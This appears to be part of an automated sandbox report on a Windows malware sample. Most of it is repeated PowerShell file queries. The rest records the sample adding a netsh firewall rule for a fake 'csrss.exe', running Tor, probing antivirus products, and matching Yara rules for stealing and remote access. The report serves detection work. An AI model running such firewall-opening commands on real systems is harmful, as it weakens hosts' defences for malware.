Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe Queries volume information: C:\Users\user\AppData\Local\Temp\csrss\tor\torrc VolumeInformation
Source: C:\Windows\rss\csrss.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Source: C:\Users\user\Desktop\kdsyitkxmS.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: csrss.exe, 00000014.00000003.210669065138.000000000C564000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209396461579.000000000C60E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: msmpeng.exe
Source: csrss.exe, 00000014.00000003.210669065138.000000000C564000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209396461579.000000000C60E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
